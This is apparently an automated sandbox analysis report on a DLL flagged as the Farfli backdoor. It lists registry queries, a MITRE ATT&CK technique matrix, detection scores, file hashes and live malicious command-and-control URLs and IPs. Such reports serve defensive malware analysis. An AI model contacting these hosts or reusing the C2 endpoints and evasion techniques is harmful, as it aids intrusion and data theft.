Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: Amcache.hve.13.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr | Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\rundll32.exe | Device IO: \Device\Harddisk0\DR0
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 11 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 31 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 111 Process Injection | 31 Virtualization/Sandbox Evasion | LSASS Memory | 31 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 11 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 111 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Rundll32 | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 111 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Behavior Graph ID: 1578323, Sample: QCTYoyX422.dll, Startdate: 19/12/2024, Architecture: WINDOWS, Score: 100

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| QCTYoyX422.dll | 79% | ReversingLabs | Win32.Backdoor.Farfli | |
| QCTYoyX422.dll | 100% | Avira | TR/Crypt.PEPM.Gen | |
| QCTYoyX422.dll | 100% | Joe Sandbox ML | | |
No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| blogx.sina.com.cn | 116.133.8.92 | true | false | | high |
| host123.zz.am | unknown | unknown | false | | high |
| blog.sina.com.cn | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://107.160.131.254:23588/article.php | true | | unknown |
| https://blog.sina.com.cn/u/5762479093 | false | | high |
| http://107.160.131.253:18659//joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWmtaWndm@ | true | | unknown |
| http://107.163.56.110:18530/u1129.html | true | | unknown |
                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs
IP               Domain             Country        ASN    ASN Name                                        Malicious
116.133.8.92     blogx.sina.com.cn  China          4837   CHINA169-BACKBONECHINAUNICOMChina169BackboneCN  false
107.163.56.110   unknown            United States  20248  TAKE2US                                         true
107.160.131.253  unknown            United States  40676  AS40676US                                       true
107.160.131.254  unknown            United States  40676  AS40676US                                       true
                                                                                                        IP
                                                                                                        127.0.0.1
                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1578323
                                                                                                        Start date and time:2024-12-19 15:32:09 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 9m 53s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:33
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:QCTYoyX422.dll
                                                                                                        renamed because original name is a hash value
                                                                                                        Original Sample Name:78131997ac3542a3ce1c2ae4afac1474ba0a19cb.dll
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winDLL@42/11@48/5
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 93%
                                                                                                        • Number of executed functions: 28
                                                                                                        • Number of non-executed functions: 20
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .dll
                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 199.232.214.172, 20.42.65.92, 199.232.210.172, 20.190.181.6, 13.107.246.63, 4.245.163.56
                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • VT rate limit hit for: QCTYoyX422.dll
Time      Type             Description
09:33:16  API Interceptor  832382x Sleep call for process: rundll32.exe modified
09:33:23  API Interceptor  1x Sleep call for process: loaddll32.exe modified
09:33:26  API Interceptor  2x Sleep call for process: WerFault.exe modified
                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):721
                                                                                                                                          Entropy (8bit):4.5083577671839175
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:yFDUeE+mjxxx/QQLDtnoXZr53rUOrTujsOdyuuuuuuuuuuuuuuuuuuuuM:8DHmjxn/QQLDtnKZrFksOdZ
                                                                                                                                          MD5:A668E3EF36C02C5FF671A55C180016DC
                                                                                                                                          SHA1:5A143B7D1A587E0AADAA8FE9B20B6E6DA6639952
                                                                                                                                          SHA-256:797FCF79DB59180F1F43836A256C12ED7C33D7DBEC45BEF6BBDA8BC55E635A1C
                                                                                                                                          SHA-512:09D51B72BF50E1B265DA020BEE0594B286720D0216738CDDB06F9F8392A46F9DFFE810A63A06BE04947FDCBB2D038070262FBB79900695043EA7FCFCA7D5470E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..2024-12-20 20:56..iOffset....2024-12-21 18:24..iOffset....2024-12-22 14:42..iOffset....2024-12-23 12:10..iOffset....2024-12-25 07:32..iOffset....2024-12-26 03:15..iOffset....2024-12-26 23:33..iOffset....2024-12-29 00:31..iOffset....2024-12-31 20:24..iOffset....2025-01-04 17:47..iOffset....2025-01-11 06:46..iOffset....2025-01-16 14:37..iOffset....2025-01-21 17:44..iOffset....2025-03-20 04:58..iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset......Z.iOffset..
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):65536
                                                                                                                                          Entropy (8bit):0.9508901274102053
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:BcibON7t30BU/wjeT8WaZYzuiFgZ24IO8dci:2iiBtEBU/wjeobYzuiFgY4IO8dci
                                                                                                                                          MD5:1507A11A1FC3A55A522C8FEC2CF92C5D
                                                                                                                                          SHA1:238A94BF85A587222958BB3620985303A45BCA40
                                                                                                                                          SHA-256:A3EEBD33E62ABADA43704128CCF5D1ACFDCE80616C63F0B495A5B15A8F5DAE65
                                                                                                                                          SHA-512:F7F46E868B09234812D7359F224C55DFD28FF01C2A52704FE13C61260305AC88F67F85D0466ADC5033E914F4B56C95538B77C2D31D9B1254763F2A813A0CF2B3
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):65536
                                                                                                                                          Entropy (8bit):0.9510379801046509
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:dxi8WO4v0BU/wjeT8WaZYzuiFgZ24IO8dci:7i8X4cBU/wjeobYzuiFgY4IO8dci
                                                                                                                                          MD5:1E0E98B4ED0AA8C07E40634B222841C2
                                                                                                                                          SHA1:B62BBC20A57BF9ED823285E764F532F100C00603
                                                                                                                                          SHA-256:57531E99A9EB90CA81C78F6AC6E6C77F603D106EF379B8F5E90825E6CBC3A71F
                                                                                                                                          SHA-512:08D8A05AA690E9E90D6EC686E2B67A02409C57BE7595641AD082B068FE04B4AEE0B3AFF14EB654D6F7B2369FBD9E882391183FFCF83250C3805BEB144B8E8FF2
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:33:21 2024, 0x1205a4 type
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):43452
                                                                                                                                          Entropy (8bit):2.0845666960232223
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:4sqIZINXJXXcO5H4c80h64wupxP/BC9roNWiuElMA:nZI/5HZpjT/BC9uWivM
                                                                                                                                          MD5:3BC51876FE3DD3818E5B6490D6DBDC83
                                                                                                                                          SHA1:68DCBA0B9D92868C3E543D02BA26E94547669FCF
                                                                                                                                          SHA-256:952040479E604E8418AE48591D01210E7D2C86C6F57686381F616E56AE2C2448
                                                                                                                                          SHA-512:C6520A8AC9D1B6424DF961613A5405214B799F188B4347E97A708310E6968CEAC927FA4CEC6E9CAEC27DDBBC29A43CC28D422EC5B7929D974FA974ECA88D4C50
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
